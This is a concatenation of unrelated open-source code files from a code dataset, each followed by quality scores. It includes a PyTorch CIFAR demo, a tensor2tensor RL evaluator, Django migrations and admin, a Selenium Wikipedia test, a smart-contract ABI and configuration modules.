class InfSpecialCommentObject(InfSectionCommonDef):
def __init__(self):
self.SpecialComments = Sdict()
InfSectionCommonDef.__init__(self)
def SetSpecialComments(self, SepcialSectionList = None, Type = ''):
if Type == DT.TYPE_HOB_SECTION or \
Type == DT.TYPE_EVENT_SECTION or \
Type == DT.TYPE_BOOTMODE_SECTION:
for Item in SepcialSectionList:
if Type in self.SpecialComments:
ObjList = self.SpecialComments[Type]
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
else:
ObjList = []
ObjList.append(Item)
self.SpecialComments[Type] = ObjList
return True
def GetSpecialComments(self):
return self.SpecialComments
## ErrorInInf
#
# An encapsulate of Error for INF parser.
#
def ErrorInInf(Message=None, ErrorCode=None, LineInfo=None, RaiseError=True):
if ErrorCode is None:
ErrorCode = ToolError.FORMAT_INVALID
if LineInfo is None:
LineInfo = ['', -1, '']
Logger.Error("InfParser",
ErrorCode,
Message=Message,
File=LineInfo[0],
Line=LineInfo[1],
ExtraData=LineInfo[2],
RaiseError=RaiseError)
| 2.15625 | 2 |
21-08/Starters8/1.py | allenalvin333/Codechef_Competitions | 0 | 3342 | # https://www.codechef.com/START8C/problems/PENALTY
for T in range(int(input())):
n=list(map(int,input().split()))
a=b=0
for i in range(len(n)):
if(n[i]==1):
if(i%2==0): a+=1
else: b+=1
if(a>b): print(1)
elif(b>a): print(2)
else: print(0) | 2.75 | 3 |
util/eval.py | jhong93/vpd | 7 | 3343 | <filename>util/eval.py
import matplotlib.pyplot as plt
from sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix
def save_confusion_matrix(truth, pred, out_file, norm=None):
label_names = list(set(truth) | set(pred))
label_names.sort()
truth_compact = [label_names.index(x) for x in truth]
pred_compact = [label_names.index(x) for x in pred]
cm = confusion_matrix(
truth_compact, pred_compact, labels=list(range(len(label_names))),
normalize=norm)
if norm is not None:
cm *= 100
fig = plt.figure(figsize=(20, 20))
ax = fig.add_subplot(111)
disp = ConfusionMatrixDisplay(
confusion_matrix=cm, display_labels=label_names)
disp.plot(ax=ax, xticks_rotation='vertical',
values_format='.1f' if norm is not None else 'd')
plt.tight_layout()
plt.savefig(out_file)
plt.close(fig)
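# A small, self-contained sketch of calling the helper above; the label lists are
# made up purely for illustration.
if __name__ == "__main__":
    truth = ['cat', 'dog', 'dog', 'bird', 'cat', 'dog']
    pred = ['cat', 'dog', 'cat', 'bird', 'cat', 'dog']
    # Raw counts.
    save_confusion_matrix(truth, pred, 'confusion_counts.png')
    # Row-normalised percentages; norm='true' is passed through to
    # sklearn.metrics.confusion_matrix.
    save_confusion_matrix(truth, pred, 'confusion_normalized.png', norm='true')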
| 2.75 | 3 |
python/py3study/pytorch-lab/demo-cifar.py | sillyemperor/langstudy | 0 | 3344 | import torch
import torchvision
import torchvision.transforms as transforms
import os.path
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
root = os.path.join(BASE_DIR, '../data/')
trainset = torchvision.datasets.CIFAR10(root=root, train=True,
download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset,
shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root=root, train=False,
download=True, transform=transform)
testloader = torch.utils.data.DataLoader(testset,
shuffle=False, num_workers=2)
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# print(x.shape)
x = self.pool(F.relu(self.conv1(x)))
# print(x.shape)
x = self.pool(F.relu(self.conv2(x)))
# print(x.shape)
x = x.view(-1, 16 * 5 * 5)
# print(x.shape)
x = F.relu(self.fc1(x))
# print(x.shape)
x = F.relu(self.fc2(x))
# print(x.shape)
x = self.fc3(x)
# print(x.shape)
return x
# torch.Size([1, 3, 32, 32])
# torch.Size([1, 6, 14, 14])
# torch.Size([1, 16, 5, 5])
# torch.Size([1, 400])
# torch.Size([1, 120])
# torch.Size([1, 84])
# torch.Size([1, 10])
model = Net()
import torch.optim as optim
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.0002, momentum=0.9)
from util import train_eval
train_eval(model, criterion, trainloader, testloader, optimizer, epochs=5)
# [1, 5000] loss: 2.293
# [1, 10000] loss: 2.075
# [1, 15000] loss: 1.876
# [1, 20000] loss: 1.754
# [1, 25000] loss: 1.658
# [1, 30000] loss: 1.625
# [1, 35000] loss: 1.558
# [1, 40000] loss: 1.520
# [1, 45000] loss: 1.494
# [1, 50000] loss: 1.459
# 1/5 4456/10000 44.56% (107.18255376815796s)
# [2, 5000] loss: 1.413
# [2, 10000] loss: 1.398
# [2, 15000] loss: 1.386
# [2, 20000] loss: 1.379
# [2, 25000] loss: 1.358
# [2, 30000] loss: 1.324
# [2, 35000] loss: 1.333
# [2, 40000] loss: 1.280
# [2, 45000] loss: 1.296
# [2, 50000] loss: 1.304
# 2/5 5357/10000 53.56999999999999% (105.8866639137268s)
# [3, 5000] loss: 1.226
# [3, 10000] loss: 1.231
# [3, 15000] loss: 1.215
# [3, 20000] loss: 1.235
# [3, 25000] loss: 1.199
# [3, 30000] loss: 1.187
# [3, 35000] loss: 1.192
# [3, 40000] loss: 1.194
# [3, 45000] loss: 1.196
# [3, 50000] loss: 1.191
# 3/5 5729/10000 57.29% (105.63971090316772s)
# [4, 5000] loss: 1.117
# [4, 10000] loss: 1.096
# [4, 15000] loss: 1.121
# [4, 20000] loss: 1.123
# [4, 25000] loss: 1.107
# [4, 30000] loss: 1.120
# [4, 35000] loss: 1.124
# [4, 40000] loss: 1.094
# [4, 45000] loss: 1.105
# [4, 50000] loss: 1.102
# 4/5 5829/10000 58.29% (112.56915497779846s)
# [5, 5000] loss: 1.034
# [5, 10000] loss: 1.024
# [5, 15000] loss: 1.040
# [5, 20000] loss: 1.027
# [5, 25000] loss: 1.043
# [5, 30000] loss: 1.049
# [5, 35000] loss: 1.024
# [5, 40000] loss: 1.042
# [5, 45000] loss: 1.027
# [5, 50000] loss: 1.027
# 5/5 6178/10000 61.78% (109.75669193267822s)
# 61.0% (541.0347754955292s)
| 2.875 | 3 |
astroquery/neodys/tests/test_neodys_remote.py | B612-Asteroid-Institute/astroquery | 0 | 3345 |
from ... import neodys
def test_neodys_query():
test_object = "2018VP1"
res_kep_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=0)
res_kep_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=1)
res_eq_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=0)
res_eq_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=1)
assert len(res_kep_0['Keplerian State Vector']) == 6
assert len(res_kep_0['Covariance Matrix']) == 21
assert res_kep_0['Mean Julian Date'][0] != res_kep_1['Mean Julian Date'][0]
assert len(res_eq_0['Equinoctial State Vector']) == 6
assert len(res_eq_0['Covariance Matrix']) == 21
assert len(res_eq_0['Keplerian Correlation Matrix']) == 0
assert res_eq_0['Mean Julian Date'][0] != res_eq_1['Mean Julian Date'][0]
| 2.203125 | 2 |
corehq/apps/accounting/migrations/0026_auto_20180508_1956.py | kkrampa/commcare-hq | 1 | 3346 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-05-08 19:56
from __future__ import unicode_literals
from __future__ import absolute_import
from django.db import migrations
def noop(*args, **kwargs):
pass
def _convert_emailed_to_array_field(apps, schema_editor):
BillingRecord = apps.get_model('accounting', 'BillingRecord')
for record in BillingRecord.objects.all():
if record.emailed_to != '':
record.emailed_to_list = record.emailed_to.split(',')
record.save()
WireBillingRecord = apps.get_model('accounting', 'WireBillingRecord')
for wirerecord in WireBillingRecord.objects.all():
if wirerecord.emailed_to != '':
wirerecord.emailed_to_list = wirerecord.emailed_to.split(',')
wirerecord.save()
class Migration(migrations.Migration):
dependencies = [
('accounting', '0025_auto_20180508_1952'),
]
operations = [
migrations.RunPython(_convert_emailed_to_array_field, reverse_code=noop)
]
| 1.851563 | 2 |
tensor2tensor/rl/evaluator.py | SouBanerjee/tensor2tensor | 1 | 3347 | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Evaluation script for RL agents.
Example invocation:
python -m tensor2tensor.rl.evaluator \
--policy_dir=$HOME/t2t/rl_v1/policy \
--eval_metrics_dir=$HOME/t2t/rl_v1/full_eval_metrics \
--hparams_set=rlmb_base \
--hparams='batch_size=64'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from tensor2tensor.data_generators import gym_env
from tensor2tensor.layers import common_video
from tensor2tensor.models.research import rl # pylint: disable=unused-import
from tensor2tensor.rl import rl_utils
from tensor2tensor.rl import trainer_model_based_params # pylint: disable=unused-import
from tensor2tensor.utils import flags as t2t_flags # pylint: disable=unused-import
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("output_dir", "", "Main directory for multi-runs.")
flags.DEFINE_integer("total_num_workers", 1, "How many workers in total.")
flags.DEFINE_string("worker_to_game_map", "", "How to map workers to games.")
flags.DEFINE_string("policy_dir", "", "Directory with policy checkpoints.")
flags.DEFINE_string("model_dir", "", "Directory with model checkpoints.")
flags.DEFINE_string(
"eval_metrics_dir", "", "Directory to output the eval metrics at."
)
flags.DEFINE_bool("full_eval", True, "Whether to ignore the timestep limit.")
flags.DEFINE_enum(
"agent", "policy", ["random", "policy", "planner"], "Agent type to use."
)
flags.DEFINE_bool(
"eval_with_learner", True,
"Whether to use the PolicyLearner.evaluate function instead of an "
"out-of-graph one. Works only with --agent=policy."
)
flags.DEFINE_string(
"planner_hparams_set", "planner_small", "Planner hparam set."
)
flags.DEFINE_string("planner_hparams", "", "Planner hparam overrides.")
flags.DEFINE_integer(
"log_every_steps", 20, "Log every how many environment steps."
)
flags.DEFINE_string(
"debug_video_path", "", "Path to save the planner debug video at."
)
# Unused flags needed to pass for multi-run infrastructure.
flags.DEFINE_bool("autotune", False, "Unused here.")
flags.DEFINE_string("objective", "", "Unused here.")
flags.DEFINE_string("client_handle", "client_0", "Unused.")
flags.DEFINE_bool("maximize_tuner_objective", True, "Unused.")
flags.DEFINE_integer("vizier_search_algorithm", 0, "Unused.")
@registry.register_hparams
def planner_tiny():
return tf.contrib.training.HParams(
num_rollouts=1,
planning_horizon=2,
rollout_agent_type="random",
batch_size=1,
env_type="simulated",
)
@registry.register_hparams
def planner_small():
return tf.contrib.training.HParams(
num_rollouts=64,
planning_horizon=16,
rollout_agent_type="policy",
batch_size=64,
env_type="simulated",
)
def make_env(env_type, real_env, sim_env_kwargs):
"""Factory function for envs."""
return {
"real": lambda: real_env.new_like( # pylint: disable=g-long-lambda
batch_size=sim_env_kwargs["batch_size"],
store_rollouts=False,
),
"simulated": lambda: rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames( # pylint: disable=g-long-lambda
**sim_env_kwargs
),
}[env_type]()
def make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs=None, frame_stack_size=None, planning_horizon=None,
rollout_agent_type=None, batch_size=None, num_rollouts=None,
inner_batch_size=None, video_writer=None, env_type=None):
"""Factory function for Agents."""
if batch_size is None:
batch_size = env.batch_size
return {
"random": lambda: rl_utils.RandomAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space
),
"policy": lambda: rl_utils.PolicyAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space,
policy_hparams, policy_dir, sampling_temp
),
"planner": lambda: rl_utils.PlannerAgent( # pylint: disable=g-long-lambda
batch_size, make_agent(
rollout_agent_type, env, policy_hparams, policy_dir,
sampling_temp, batch_size=inner_batch_size
), make_env(env_type, env.env, sim_env_kwargs),
lambda env: rl_utils.BatchStackWrapper(env, frame_stack_size),
num_rollouts, planning_horizon,
discount_factor=policy_hparams.gae_gamma, video_writer=video_writer
),
}[agent_type]()
def make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=None,
video_writer=None
):
"""Returns an out-of-graph eval_fn using the Agent API."""
def eval_fn(env, loop_hparams, policy_hparams, policy_dir, sampling_temp):
"""Eval function."""
base_env = env
env = rl_utils.BatchStackWrapper(env, loop_hparams.frame_stack_size)
sim_env_kwargs = rl.make_simulated_env_kwargs(
base_env, loop_hparams, batch_size=planner_hparams.batch_size,
model_dir=model_dir
)
agent = make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs, loop_hparams.frame_stack_size,
planner_hparams.planning_horizon, planner_hparams.rollout_agent_type,
num_rollouts=planner_hparams.num_rollouts,
inner_batch_size=planner_hparams.batch_size, video_writer=video_writer,
env_type=planner_hparams.env_type
)
rl_utils.run_rollouts(
env, agent, env.reset(), log_every_steps=log_every_steps
)
assert len(base_env.current_epoch_rollouts()) == env.batch_size
return eval_fn
def evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir, eval_metrics_dir,
agent_type, eval_with_learner, log_every_steps, debug_video_path,
report_fn=None, report_metric=None
):
"""Evaluate."""
if eval_with_learner:
assert agent_type == "policy"
if report_fn:
assert report_metric is not None
eval_metrics_writer = tf.summary.FileWriter(eval_metrics_dir)
video_writer = None
kwargs = {}
if not eval_with_learner:
if debug_video_path:
video_writer = common_video.WholeVideoWriter(
fps=10, output_path=debug_video_path, file_format="avi")
kwargs["eval_fn"] = make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=log_every_steps,
video_writer=video_writer
)
eval_metrics = rl_utils.evaluate_all_configs(
loop_hparams, policy_dir, **kwargs
)
rl_utils.summarize_metrics(eval_metrics_writer, eval_metrics, 0)
if video_writer is not None:
video_writer.finish_to_disk()
# Report metrics
if report_fn:
if report_metric == "mean_reward":
metric_name = rl_utils.get_metric_name(
sampling_temp=loop_hparams.eval_sampling_temps[0],
max_num_noops=loop_hparams.eval_max_num_noops,
clipped=False
)
report_fn(eval_metrics[metric_name], 0)
else:
report_fn(eval_metrics[report_metric], 0)
return eval_metrics
def get_game_for_worker(map_name, directory_id):
"""Get game for the given worker (directory) id."""
if map_name == "v100unfriendly":
games = ["chopper_command", "boxing", "asterix", "seaquest"]
worker_per_game = 5
elif map_name == "human_nice":
games = gym_env.ATARI_GAMES_WITH_HUMAN_SCORE_NICE
worker_per_game = 5
else:
raise ValueError("Unknown worker to game map name: %s" % map_name)
games.sort()
game_id = (directory_id - 1) // worker_per_game
tf.logging.info("Getting game %d from %s." % (game_id, games))
return games[game_id]
def main(_):
now = datetime.datetime.now()
now_tag = now.strftime("%Y_%m_%d_%H_%M")
loop_hparams = trainer_lib.create_hparams(
FLAGS.loop_hparams_set, FLAGS.loop_hparams
)
if FLAGS.worker_to_game_map and FLAGS.total_num_workers > 1:
loop_hparams.game = get_game_for_worker(
FLAGS.worker_to_game_map, FLAGS.worker_id + 1)
tf.logging.info("Set game to %s." % loop_hparams.game)
if FLAGS.full_eval:
loop_hparams.eval_rl_env_max_episode_steps = -1
planner_hparams = trainer_lib.create_hparams(
FLAGS.planner_hparams_set, FLAGS.planner_hparams
)
policy_dir = FLAGS.policy_dir
model_dir = FLAGS.model_dir
eval_metrics_dir = FLAGS.eval_metrics_dir
if FLAGS.output_dir:
cur_dir = FLAGS.output_dir
if FLAGS.total_num_workers > 1:
cur_dir = os.path.join(cur_dir, "%d" % (FLAGS.worker_id + 1))
policy_dir = os.path.join(cur_dir, "policy")
model_dir = os.path.join(cur_dir, "world_model")
eval_metrics_dir = os.path.join(cur_dir, "evaluator_" + now_tag)
tf.logging.info("Writing metrics to %s." % eval_metrics_dir)
if not tf.gfile.Exists(eval_metrics_dir):
tf.gfile.MkDir(eval_metrics_dir)
evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir,
eval_metrics_dir, FLAGS.agent, FLAGS.eval_with_learner,
FLAGS.log_every_steps if FLAGS.log_every_steps > 0 else None,
debug_video_path=FLAGS.debug_video_path
)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| 1.65625 | 2 |
src/part_2_automation/test_test1.py | AndreiHustiuc/IT_Factory_Course | 0 | 3348 | <reponame>AndreiHustiuc/IT_Factory_Course
# Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class TestTest1():
def setup_method(self, method):
self.driver = webdriver.Chrome()
self.vars = {}
def teardown_method(self, method):
self.driver.quit()
def test_test1(self):
self.driver.get("https://www.wikipedia.org/")
self.driver.set_window_size(1920, 1040)
self.driver.find_element(By.ID, "searchInput").click()
self.driver.find_element(By.ID, "searchInput").send_keys("Romania")
self.driver.find_element(By.ID, "searchInput").send_keys(Keys.ENTER)
self.driver.find_element(By.CSS_SELECTOR, ".tocsection-21 .toctext").click()
self.driver.execute_script("window.scrollTo(0,10634)")
self.driver.find_element(By.CSS_SELECTOR, ".thumb:nth-child(30) .thumbimage").click()
self.driver.execute_script("window.scrollTo(0,0)")
| 2.640625 | 3 |
app/grandchallenge/components/admin.py | njmhendrix/grand-challenge.org | 1 | 3349 | from django.contrib import admin
from grandchallenge.components.models import (
ComponentInterface,
ComponentInterfaceValue,
)
class ComponentInterfaceAdmin(admin.ModelAdmin):
list_display = (
"pk",
"title",
"slug",
"kind",
"default_value",
"relative_path",
)
readonly_fields = (
"default_value",
"relative_path",
)
class ComponentInterfaceValueAdmin(admin.ModelAdmin):
list_display = ("pk", "interface", "value", "file", "image")
readonly_fields = ("interface", "value", "file", "image")
admin.site.register(ComponentInterface, ComponentInterfaceAdmin)
admin.site.register(ComponentInterfaceValue, ComponentInterfaceValueAdmin)
| 1.820313 | 2 |
publishtimer/__init__.py | paragguruji/publishtimer | 0 | 3350 | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 28 15:28:24 2016
@author: <NAME>, <EMAIL>
"""
from .helpers import setup_env
done = setup_env() | 1.015625 | 1 |
netdisco/discoverables/nanoleaf_aurora.py | jjlawren/netdisco | 1 | 3351 | <reponame>jjlawren/netdisco<filename>netdisco/discoverables/nanoleaf_aurora.py
"""Discover Nanoleaf Aurora devices."""
from . import MDNSDiscoverable
class Discoverable(MDNSDiscoverable):
"""Add support for discovering Nanoleaf Aurora devices."""
def __init__(self, nd):
super(Discoverable, self).__init__(nd, '_nanoleafapi._tcp.local.')
| 1.679688 | 2 |
debug/compute_score_common_ts_RETREAT.py | DavidSabbagh/meeg_power_regression | 1 | 3352 | import os.path as op
import numpy as np
import pandas as pd
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import RidgeCV
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold, cross_val_score
import mne
from pyriemann.tangentspace import TangentSpace
import config_drago as cfg
meg = 'mag'
scale = 1e22
rank = 65
reg = 1e-6
seed = 42
n_jobs = 10
cv = KFold(n_splits=n_jobs, shuffle=True, random_state=seed)
def proj_covs_common(covs, picks, scale=scale, rank=rank, reg=reg):
covs = [d['covs'][:, picks][:, :, picks] for d in covs if 'subject' in d]
covs = scale * np.array(covs)
n_sub, n_fb, n_ch, n_ch = covs.shape
# covs2 = covs.reshape(n_sub*n_fb, n_ch, n_ch)
# covs_avg = np.mean(covs2, axis=0)
covs_avg = covs.mean(axis=1).mean(axis=0)
d, V = np.linalg.eigh(covs_avg)
d = d[::-1]
V = V[:, ::-1]
proj_mat = V[:, :rank].T
covs_proj = np.zeros((n_sub, n_fb, rank, rank))
for sub in range(n_sub):
for fb in range(n_fb):
covs_proj[sub, fb] = proj_mat @ covs[sub, fb] @ proj_mat.T
covs_proj[sub, fb] += reg * np.eye(rank)
return covs_proj
def proj_covs_ts(covs):
n_sub, n_fb, p, _ = covs.shape
covs_ts = np.zeros((n_sub, n_fb, (p*(p+1))//2))
for fb in range(n_fb):
covs_ts[:, fb, :] = TangentSpace(metric="wasserstein").fit(
covs[:, fb, :, :]).transform(covs[:, fb, :, :])
return covs_ts
file_covs = op.join(cfg.path_outputs, 'covs_allch_oas.float32.h5')
covs_allch = mne.externals.h5io.read_hdf5(file_covs) # (sub, fb, ch, ch)
info = np.load(op.join(cfg.path_data, 'info_allch.npy')).item()
picks = mne.pick_types(info, meg=meg)
covs = proj_covs_common(covs_allch, picks, scale=scale, rank=rank, reg=reg)
X = proj_covs_ts(covs)
X = X.reshape(len(X), -1)
info = pd.read_csv(op.join(cfg.path_data, 'participants.csv'))
subjects = [d['subject'] for d in covs_allch if 'subject' in d]
y = info.set_index('Observations').age.loc[subjects]
ridge = make_pipeline(StandardScaler(),
RidgeCV(alphas=np.logspace(-3, 5, 100)))
score = - cross_val_score(ridge, X, y, cv=cv,
scoring="neg_mean_absolute_error", n_jobs=n_jobs,
verbose=True)
| 1.851563 | 2 |
bter/publish.py | mengalong/bter | 1 | 3353 | <filename>bter/publish.py
# Copyright 2017~ mengalong <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import daiquiri
from six.moves.urllib import parse as urlparse
from stevedore import driver
logger = daiquiri.getLogger(__name__)
class PublisherManager(object):
def __init__(self, conf, url):
self.conf = conf
self.url = url
parsed_url = urlparse.urlparse(url)
logger.debug("The parsed url for publisher is :%s" % str(parsed_url))
self.publish_driver = driver.DriverManager(
'bter.publisher',
parsed_url.scheme,
invoke_args=(self.conf,),
invoke_on_load=True).driver
| 2.140625 | 2 |
web3/_utils/module_testing/math_contract.py | y19818/web3.py | 0 | 3354 |
MATH_BYTECODE = (
"606060405261022e806100126000396000f360606040523615610074576000357c01000000000000"
"000000000000000000000000000000000000000000009004806316216f391461007657806361bc22"
"1a146100995780637cf5dab0146100bc578063a5f3c23b146100e8578063d09de08a1461011d5780"
"63dcf537b11461014057610074565b005b610083600480505061016c565b60405180828152602001"
"91505060405180910390f35b6100a6600480505061017f565b604051808281526020019150506040"
"5180910390f35b6100d26004808035906020019091905050610188565b6040518082815260200191"
"505060405180910390f35b61010760048080359060200190919080359060200190919050506101ea"
"<KEY>"
"8082815260200191505060405180910390f35b610156600480803590602001909190505061021756"
"5b6040518082815260200191505060405180910390f35b6000600d9050805080905061017c565b90"
"565b60006000505481565b6000816000600082828250540192505081905550600060005054905080"
"507f3496c3ede4ec3ab3686712aa1c238593ea6a42df83f98a5ec7df9834cfa577c5816040518082"
"815260200191505060405180910390a18090506101e5565b919050565b6000818301905080508090"
"506101fb565b92915050565b600061020d6001610188565b9050610214565b90565b600060078202"
"90508050809050610229565b91905056"
)
MATH_ABI = [
{
"constant": False,
"inputs": [],
"name": "return13",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"constant": True,
"inputs": [],
"name": "counter",
"outputs": [
{"name": "", "type": "uint256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [
{"name": "amt", "type": "uint256"},
],
"name": "increment",
"outputs": [
{"name": "result", "type": "uint256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [
{"name": "a", "type": "int256"},
{"name": "b", "type": "int256"},
],
"name": "add",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"constant": False,
"inputs": [],
"name": "increment",
"outputs": [
{"name": "", "type": "uint256"},
],
"type": "function"
},
{
"constant": False,
"inputs": [
{"name": "a", "type": "int256"},
],
"name": "multiply7",
"outputs": [
{"name": "result", "type": "int256"},
],
"type": "function",
},
{
"anonymous": False,
"inputs": [
{"indexed": False, "name": "value", "type": "uint256"},
],
"name": "Increased",
"type": "event",
},
]
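# A rough sketch of how these constants are typically consumed through a web3.py
# contract factory. It is illustrative only: it assumes an already-connected `w3`
# instance, method names follow recent web3.py releases, and the bytecode above
# contains a redacted "<KEY>" segment, so it is not deployable verbatim.
#
#     factory = w3.eth.contract(abi=MATH_ABI, bytecode=MATH_BYTECODE)
#     tx_hash = factory.constructor().transact()
#     receipt = w3.eth.wait_for_transaction_receipt(tx_hash)
#     math = w3.eth.contract(address=receipt['contractAddress'], abi=MATH_ABI)
#     assert math.functions.multiply7(3).call() == 21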
| 1.203125 | 1 |
dnsdb/config.py | nuby/open_dnsdb | 1 | 3355 | <reponame>nuby/open_dnsdb
# -*- coding: utf-8 -*-
import os
import sys
from datetime import timedelta
from oslo.config import cfg
CONF = cfg.CONF
CONF.register_opts([
cfg.StrOpt('log-dir'),
cfg.StrOpt('log-file'),
cfg.StrOpt('debug'),
cfg.StrOpt('verbose'),
], 'log')
CONF.register_opts([
cfg.StrOpt('connection'),
cfg.StrOpt('data'),
], 'DB')
CONF.register_opts([
cfg.StrOpt('server'),
cfg.StrOpt('port'),
cfg.StrOpt('from_addr'),
cfg.StrOpt('info_list'),
cfg.StrOpt('alert_list'),
], 'MAIL')
CONF.register_opts([
cfg.StrOpt('allow_ip'),
cfg.StrOpt('secret_key'),
cfg.StrOpt('env'),
cfg.StrOpt('local_group'),
cfg.StrOpt('acl_dir'),
cfg.StrOpt('view_acl_group')
], 'etc')
CONF.register_opts([
cfg.IntOpt('dnsupdater_port'),
], 'api')
CONF.register_opts([
cfg.StrOpt('acl_groups'),
cfg.IntOpt('cname_ttl'),
cfg.StrOpt('view_zone')
], 'view')
CONF.register_opts([
cfg.StrOpt('base-url',
default='/',
help='The url prefix of this site.'),
cfg.StrOpt('run-mode',
default="werkzeug",
choices=('gunicorn', 'werkzeug'),
help="Run server use the specify mode."),
cfg.StrOpt('bind',
default='0.0.0.0',
help='The IP address to bind'),
cfg.IntOpt('port',
default=8080,
help='The port to listen'),
cfg.BoolOpt('debug',
default=False),
], 'web')
CONF.register_opts([
cfg.StrOpt('config',
default=None,
help='The path to a Gunicorn config file.'),
cfg.StrOpt('bind',
default='127.0.0.1:8888'),
cfg.IntOpt('workers',
default=0,
help='The number of worker processes for handling requests'),
cfg.BoolOpt('daemon',
default=False,
help='Daemonize the Gunicorn process'),
cfg.StrOpt('accesslog',
default=None,
help='The Access log file to write to.'
'"-" means log to stderr.'),
cfg.StrOpt('loglevel',
default='info',
help='The granularity of Error log outputs.',
choices=('debug', 'info', 'warning', 'error', 'critical')),
cfg.BoolOpt('ignore-healthcheck-accesslog',
default=False),
cfg.IntOpt('timeout',
default=30,
help='Workers silent for more than this many seconds are '
'killed and restarted.'),
cfg.StrOpt('worker-class',
default='sync',
help='The type of workers to use.',
choices=('sync', 'eventlet', 'gevent', 'tornado'))
], 'gunicorn')
def setup_config(app_env, app_kind, conf_dir):
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
class Config(object):
def __init__(self, app_env, app_kind, conf_dir):
# print 'conf_dir: ', conf_dir
if "--" in sys.argv:
args = sys.argv[sys.argv.index("--") + 1:]
else:
args = []
common_config_file = os.path.join(conf_dir, "etc/{}/common.conf".format(app_env))
default_config_files = [common_config_file]
app_config_file = os.path.join(conf_dir, "etc/{}/{}.conf".format(app_env, app_kind))
default_config_files.append(app_config_file)
CONF(default_config_files=default_config_files, args=args)
self.SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
self.SQLALCHEMY_DATABASE_URI = CONF.DB.connection
self.SQLALCHEMY_TRACK_MODIFICATIONS = False
self.PERMANENT_SESSION_LIFETIME = timedelta(days=1)
# SECRET_KEY = os.environ.get('SECRET_KEY') or CONF.etc.secret_key
# SQLALCHEMY_DATABASE_URI = CONF.DB.connection
# SQLALCHEMY_TRACK_MODIFICATIONS = False
# PERMANENT_SESSION_LIFETIME = timedelta(days=1)
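# A minimal sketch of the intended call pattern, assuming a conf_dir that holds
# etc/<env>/common.conf and etc/<env>/<kind>.conf as expected by the code above
# (the environment name and paths below are illustrative only):
#
#     setup_config('dev', 'web', '/path/to/open_dnsdb')
#     print(CONF.web.bind, CONF.web.port)  # options registered above
#
# or, for the Flask-style settings object:
#
#     config = Config('dev', 'web', '/path/to/open_dnsdb')
#     app.config.from_object(config)  # `app` being a Flask application, if one is used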
| 1.945313 | 2 |
rover/rover.py | cloudy/osr-rover-code | 0 | 3356 | from __future__ import print_function
import time
from rover import Robot
from connections import Connections
class Rover(Robot, Connections):
def __init__( self,
config,
bt_flag = 0,
xbox_flag = 0,
unix_flag = 0
):
self.bt_flag = bt_flag
self.xbox_flag = xbox_flag
self.unix_flag = unix_flag
super(Rover,self).__init__(config)
